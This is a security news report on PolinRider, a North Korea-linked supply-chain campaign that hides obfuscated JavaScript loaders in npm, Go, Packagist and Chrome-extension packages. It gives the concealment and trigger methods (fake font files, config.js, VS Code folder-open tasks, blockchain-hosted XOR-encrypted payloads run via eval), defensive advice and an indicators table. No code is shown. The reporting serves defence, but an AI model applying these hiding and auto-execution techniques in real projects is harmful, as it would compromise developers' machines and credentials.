Skip to content
Data Breach

North Korea-Linked Hackers Hide JavaScript Loaders in Open Source Repositories

A new wave of supply chain attacks is spreading across the open source world, and this time the target is developers themselves. Security researchers have uncovered a campaign called PolinRider that hides malicious JavaScript loaders inside trusted code repositories, waiting for unsuspecting develop...

· Jul 03, 2026 · 5 min read · 👁 1 views
North Korea-Linked Hackers Hide JavaScript Loaders in Open Source Repositories

A new wave of supply chain attacks is spreading across the open source world, and this time the target is developers themselves.

Security researchers have uncovered a campaign called PolinRider that hides malicious JavaScript loaders inside trusted code repositories, waiting for unsuspecting developers to run them.

The campaign has been linked to North Korean threat actors tied to the broader Contagious Interview and Famous Chollima activity clusters.

These groups are known for targeting software engineers with fake job offers and infected coding tests, and PolinRider appears to be an extension of that playbook, only this time hidden inside legitimate looking packages.

What makes PolinRider dangerous is its reach. It began on npm but has since spread into Packagist, Go modules, and even a Chrome extension, showing the attackers are not sticking to a single ecosystem.

Researchers from Socket.dev said the campaign has grown far larger than earlier reports suggested.

Socket.dev said in a report shared with Cyber Security News (CSN) that they identified 162 malicious release artifacts spread across 108 unique packages and extensions, including 80 compromised Go modules, 10 Packagist packages, and one Chrome extension.

The scale of this discovery shows how a single group can quietly poison multiple corners of the open source supply chain at once. Because the malicious code hides inside legitimate looking files, many developers may have installed it without realizing anything was wrong.

North Korea-Linked Hackers Hide JavaScript Loaders

The attackers behind PolinRider rely on a mix of old and new tricks to stay hidden. Earlier waves buried obfuscated JavaScript inside configuration files such as those ending in config.js, counting on developers not to scroll through every line of code.

More recent versions disguise the malicious script as a fake dot woff2 font file, a format most developers would never think to inspect.

Execution is triggered quietly through Visual Studio Code task files, which can run automatically when a folder is opened.

The Xpos587 repository list shows multiple unrelated projects updated in the same period (Source - Socket.dev)
The Xpos587 repository list shows multiple unrelated projects updated in the same period (Source – Socket.dev)

Once active, the loader reaches out to blockchain and public RPC services, including TRON, Aptos, and BNB Smart Chain networks.

It uses these connections to fetch an encrypted second stage payload, decrypt it with an embedded XOR key, and run it using the eval function.

The payloads observed so far include DEV#POPPER and OmniStealer, both capable of remote command execution, communicating with attacker servers through socket.io-client, and stealing credentials, browser data, and wallet information.

Compromised Accounts and Repository Manipulation

A major piece of this campaign centers on a GitHub account named Xpos587. Several repositories tied to this account were modified within the same narrow window on June 23 at 10:00 UTC, a pattern that lines up with account takeover rather than normal maintenance.

Two repositories connected to this account, Xpos587/git2md and Xpos587/markfetch, along with a separate project called Artiffusion-Inc/mirofish, were found carrying the hidden loader.

The markfetch repository used the fake font trick, while mirofish hid its payload inside a file called vite.config.js.

GitHub Activity exposes the force push used to rewrite repository history (Source - Socket.dev)
GitHub Activity exposes the force push used to rewrite repository history (Source – Socket.dev)

On Packagist, the campaign expanded through a namespace called sevenspan, tied to the 7span organization, with the 7span/react-list package among those affected.

Maintainers removed the fake font files once discovered, but obfuscated code hidden in configuration files remained untouched, showing partial cleanup is not enough.

The attackers also used Git history rewriting, including force pushes and backdated commits, so tampered code appears older than it really is.

Visible commit history on GitHub cannot be trusted alone, and defenders need to check activity logs directly.

Security teams should treat any environment running an affected package as compromised until proven otherwise.

The company recommended preserving forensic evidence, rebuilding from known good lockfiles, and rotating exposed secrets from a clean machine rather than the infected one.

Additional guidance includes auditing machines for VS Code tasks set to run automatically on folder open, and reviewing repositories for suspicious changes to files like tasks.json, config.js, and vite.config.js.

Indicators of Compromise (IoCs):-

TypeIndicatorDescription
GitHub AccountXpos587Threat actor controlled account linked to bulk repository modification on June 23, 10:00 UTC 
GitHub RepositoryXpos587/git2mdRepository compromised as part of the PolinRider campaign 
GitHub RepositoryXpos587/markfetchRepository hiding a fake .woff2 font file payload 
GitHub RepositoryArtiffusion-Inc/mirofishRepository hiding malicious code inside vite.config.js 
Packagist NamespacesevenspanCompromised namespace maintained by the 7span organization 
GitHub Organization7spanOrganization linked to compromised Packagist packages 
GitHub Repository7span/react-listRepository associated with malicious release activity 
File Namevite.config.jsConfiguration file used to conceal obfuscated JavaScript loader 
File Type.woff2 (fake font file)Disguised payload format used to hide malicious loader code 
VS Code Config.vscode/tasks.jsonTask file abused with “runOn”: “folderOpen” to trigger loader execution 
Malware PayloadDEV#POPPERSecond-stage payload delivering command execution and credential theft 
Malware PayloadOmniStealerSecond-stage payload targeting browser data and cryptocurrency wallets 
InfrastructureTRON, Aptos, BNB Smart Chain RPC servicesBlockchain infrastructure abused to retrieve encrypted payload material 

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

Source: CybersecurityNews.com

Follow ShomoySoft for more: Follow on Facebook

💬 Comments (0)

Login to join the discussion.

No comments yet. Be the first!

Recommended for you